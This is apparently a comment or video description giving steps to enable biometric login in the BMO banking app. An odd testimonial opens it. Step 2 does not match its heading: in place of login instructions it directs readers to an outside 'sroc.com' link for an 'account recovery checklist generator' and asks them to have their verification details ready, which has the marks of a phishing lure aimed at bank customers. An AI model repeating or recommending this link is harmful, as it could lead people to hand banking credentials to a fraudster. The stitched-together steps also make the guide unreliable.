I ran into this last week, Swap fixed it for me. If you're looking to enable biometric login for your BMO bank account, follow these simple steps. Step 1. Open the BMO app. Launch the BMO mobile banking app on your device. Make sure you have the latest version installed for the best experience. Step 2. Log into your account. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Go to Settings. Once logged in, navigate to the Settings menu. This is usually found by tapping on your profile icon or the menu icon in the top corner. Step 4. Enable biometric login. In the settings, look for the option labeled Biometric Login or Fingerprint/Face ID. Toggle this option on to enable it. Step 5. Confirm your choice. You may be prompted to confirm your choice by entering your password again or verifying your identity through a security question. Make sure to follow the prompts. If you don't see the biometric option, ensure your device supports it and that you've set up your fingerprint or facial recognition in your device settings. Now you're all set to enjoy quick and secure access to your BMO bank account. If you have any questions, feel free to ask.